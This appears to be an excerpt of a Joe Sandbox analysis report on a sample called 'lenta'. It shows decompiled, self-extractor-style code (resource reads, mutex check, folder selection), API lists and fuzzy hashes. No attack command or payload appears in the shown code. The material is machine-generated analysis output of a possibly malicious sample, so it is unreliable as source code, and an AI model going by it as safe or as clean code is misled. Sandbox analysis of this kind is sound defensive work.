                                                                                                                                                                                                                                            0x00a932b6
                                                                                                                                                                                                                                            0x00a932b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a932be
                                                                                                                                                                                                                                            0x00a93280
                                                                                                                                                                                                                                            0x00a93289
                                                                                                                                                                                                                                            0x00a9328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9328e
                                                                                                                                                                                                                                            0x00a9327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9327b
                                                                                                                                                                                                                                            0x00000000

APIs
• LoadStringA.USER32(000003E8,00A98598,00000200), ref: 00A93271
• GetDesktopWindow.USER32 ref: 00A933E2
• SetWindowTextA.USER32(?,lenta), ref: 00A933F7
• SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A93410
• GetDlgItem.USER32(?,00000836), ref: 00A93426
• EnableWindow.USER32(00000000), ref: 00A9342D
• EndDialog.USER32(?,00000000), ref: 00A9343F
Strings
Memory Dump Source
• Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
Similarity
• API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$lenta
• API String ID: 2418873061-2011945725
• Opcode ID: 9905a4bff75b37f91540f869a5148204f924e1b9294029a7183182ad3983234c
• Instruction ID: 2019e256d002927090024b02adf54369c2bacef0d64672ebdb75fadfa15a0e67
• Opcode Fuzzy Hash: 9905a4bff75b37f91540f869a5148204f924e1b9294029a7183182ad3983234c
• Instruction Fuzzy Hash: AF514D3238024077EF219B795D4DFBB29FCEB96B55F20412AF106DA1D0DEA4CE0392A1
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A92CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0xa99a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0xa99140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0xa98a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0xa988c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0xa993ec = 1;
                                                                                                                                                                                                                                            				_t20 = E00A9468F("TITLE", 0xa99154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0xa9858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0xa99a34;
                                                                                                                                                                                                                                            					if(E00A9468F("EXTRACTOPT", 0xa99a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0xa99a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0xa99120 =  *0xa99120 & _t65;
                                                                                                                                                                                                                                            							if(E00A95C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0xa98a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa98184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa98a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E00A936EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0xa99a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0xa99a34 & 0x00000100) == 0 || ( *0xa98a38 & 0x00000001) != 0 || E00A918A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E00A96517(_t57, 0x7d6, _t34, E00A919E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A92390(0xa98a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E00A944B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E00A9468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0xa98588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0xa99a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E00A944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E00A944B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0xa98588);
                                                                                                                                                                                                                                            										 *0xa99124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a92eed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92eed
                                                                                                                                                                                                                                            0x00a92eef
                                                                                                                                                                                                                                            0x00a92eef
                                                                                                                                                                                                                                            0x00a92eef
                                                                                                                                                                                                                                            0x00a92eef
                                                                                                                                                                                                                                            0x00a92ea2
                                                                                                                                                                                                                                            0x00a92e86
                                                                                                                                                                                                                                            0x00a92e88
                                                                                                                                                                                                                                            0x00a92e88
                                                                                                                                                                                                                                            0x00a92e43
                                                                                                                                                                                                                                            0x00a92e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92e48
                                                                                                                                                                                                                                            0x00a92e30
                                                                                                                                                                                                                                            0x00a92e30
                                                                                                                                                                                                                                            0x00a92ef8
                                                                                                                                                                                                                                            0x00a92f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92f01
                                                                                                                                                                                                                                            0x00a92d8a
                                                                                                                                                                                                                                            0x00a92d8f
                                                                                                                                                                                                                                            0x00a92da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92da3
                                                                                                                                                                                                                                            0x00a92dae
                                                                                                                                                                                                                                            0x00a92db4
                                                                                                                                                                                                                                            0x00a92dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92dca
                                                                                                                                                                                                                                            0x00a92dd3
                                                                                                                                                                                                                                            0x00a92df5
                                                                                                                                                                                                                                            0x00a92e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92dd5
                                                                                                                                                                                                                                            0x00a92dde
                                                                                                                                                                                                                                            0x00a92de3
                                                                                                                                                                                                                                            0x00a92e04
                                                                                                                                                                                                                                            0x00a92e0a
                                                                                                                                                                                                                                            0x00a92e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92e10
                                                                                                                                                                                                                                            0x00a92dd3
                                                                                                                                                                                                                                            0x00a92dbb
                                                                                                                                                                                                                                            0x00a92da1
                                                                                                                                                                                                                                            0x00a92d5b
                                                                                                                                                                                                                                            0x00a92d5b
                                                                                                                                                                                                                                            0x00a92d5d
                                                                                                                                                                                                                                            0x00a92d69
                                                                                                                                                                                                                                            0x00a92d6e
                                                                                                                                                                                                                                            0x00a92f06
                                                                                                                                                                                                                                            0x00a92f06
                                                                                                                                                                                                                                            0x00a92f06
                                                                                                                                                                                                                                            0x00a92d59
                                                                                                                                                                                                                                            0x00a92f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A92CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A92CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A92CF9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A92DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92E0A
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                            • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                            • Opcode ID: 17b5cb8af89afaac3c0f090d79ce8a7c11588143cba92d20f9c8c289b47df541
                                                                                                                                                                                                                                            • Instruction ID: d74ed699062868c344ec5ec34d6147a52c079d1e98f9863d3ea3e8ce2b981273
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17b5cb8af89afaac3c0f090d79ce8a7c11588143cba92d20f9c8c289b47df541
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F551C3703403017BEF64ABA89D8ABBB2AE8EB55740F10402BF941D55E5DFB88C438765
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E00A934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
	void* _t12;
	void* _t13;
	void* _t17;
	void* _t23;
	void* _t25;
	struct HWND__* _t35;
	struct HWND__* _t38;
	void* _t39;

	_t9 = _a8 - 0x10;
	if(_t9 == 0) {
		__eflags = 1;
		L19:
		_push(0);
		*0xa991d8 = 1;
		L20:
		_push(_a4);
		L21:
		EndDialog();
		L22:
		return 1;
	}
	_push(1);
	_pop(1);
	_t12 = _t9 - 0xf2;
	if(_t12 == 0) {
		__eflags = _a12 - 0x1b;
		if(_a12 != 0x1b) {
			goto L22;
		}
		goto L19;
	}
	_t13 = _t12 - 0xe;
	if(_t13 == 0) {
		_t35 = _a4;
		*0xa98584 = _t35;
		E00A943D0(_t35, GetDesktopWindow());
		__eflags =  *0xa98184; // 0x1
		if(__eflags != 0) {
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
		}
		SetWindowTextA(_t35, "lenta");
		_t17 = CreateThread(0, 0, E00A94FE0, 0, 0, 0xa98798);
		*0xa9879c = _t17;
		__eflags = _t17;
		if(_t17 != 0) {
			goto L22;
		} else {
			E00A944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
			_push(0);
			_push(_t35);
			goto L21;
		}
	}
	_t23 = _t13 - 1;
	if(_t23 == 0) {
		__eflags = _a12 - 2;
		if(_a12 != 2) {
			goto L22;
		}
		ResetEvent( *0xa9858c);
		_t38 =  *0xa98584; // 0x0
		_t25 = E00A944B9(_t38, 0x4b2, 0xa91140, 0, 0x20, 4);
		__eflags = _t25 - 6;
		if(_t25 == 6) {
			L11:
			*0xa991d8 = 1;
			SetEvent( *0xa9858c);
			_t39 =  *0xa9879c; // 0x0
			E00A93680(_t39);
			_push(0);
			goto L20;
		}
		__eflags = _t25 - 1;
		if(_t25 == 1) {
			goto L11;
		}
		SetEvent( *0xa9858c);
		goto L22;
	}
	if(_t23 == 0xe90) {
		TerminateThread( *0xa9879c, 0);
		EndDialog(_a4, _a12);
		return 1;
	}
	return 0;
}












                                                                                                                                                                                                                                            0x00a93584
                                                                                                                                                                                                                                            0x00a9359b
                                                                                                                                                                                                                                            0x00a935a1
                                                                                                                                                                                                                                            0x00a935a7
                                                                                                                                                                                                                                            0x00a935ad
                                                                                                                                                                                                                                            0x00a935b3
                                                                                                                                                                                                                                            0x00a935b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a935b8
                                                                                                                                                                                                                                            0x00a93586
                                                                                                                                                                                                                                            0x00a93588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93590
                                                                                                                                                                                                                                            0x00a93524
                                                                                                                                                                                                                                            0x00a93535
                                                                                                                                                                                                                                            0x00a93541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00A93535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A93541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 00A9355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00A91140,00000000,00000020,00000004), ref: 00A93590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A935C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A935F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A935F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A93610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A93617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A93623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00A93637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A93671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 576ffe6a9bba94a7b7dfb416f541538ff01501a741383e874214a20ec1fe5665
                                                                                                                                                                                                                                            • Instruction ID: 8a0ff3adec95617880a87d126902c8af908d12abd783c9cfe4b1de12c7fc76b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 576ffe6a9bba94a7b7dfb416f541538ff01501a741383e874214a20ec1fe5665
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED318332340301BBDF209FA5AC4DE6B3AF5E79AB41F60461BF702952B0CE758902CA95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E00A94224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E00A944B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0xa988c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0xa987a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0xa98598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E00A94200;
                                                                                                                                                                                                                                            					_v28 = 0xa988c0;
                                                                                                                                                                                                                                            					 *0xa9a288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0xa9a288(_t32, 0xa988c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0xa988c0 != 0) {
                                                                                                                                                                                                                                            							E00A91680(0xa987a0, 0x104, 0xa988c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa9a288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0xa987a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0xa988c0);
                                                                                                                                                                                                                                            					_t61 = 0xa988c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0xa988c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0xa988c0; // 0x1531181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0xa988c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0xa988c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A94236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A9424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A94263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A9427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,00A988C0,?,00000001), ref: 00A9429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A988C0,01531181,?,00000001), ref: 00A942C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A988C0,00000000,?,00000001), ref: 00A942D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A94391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A943A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
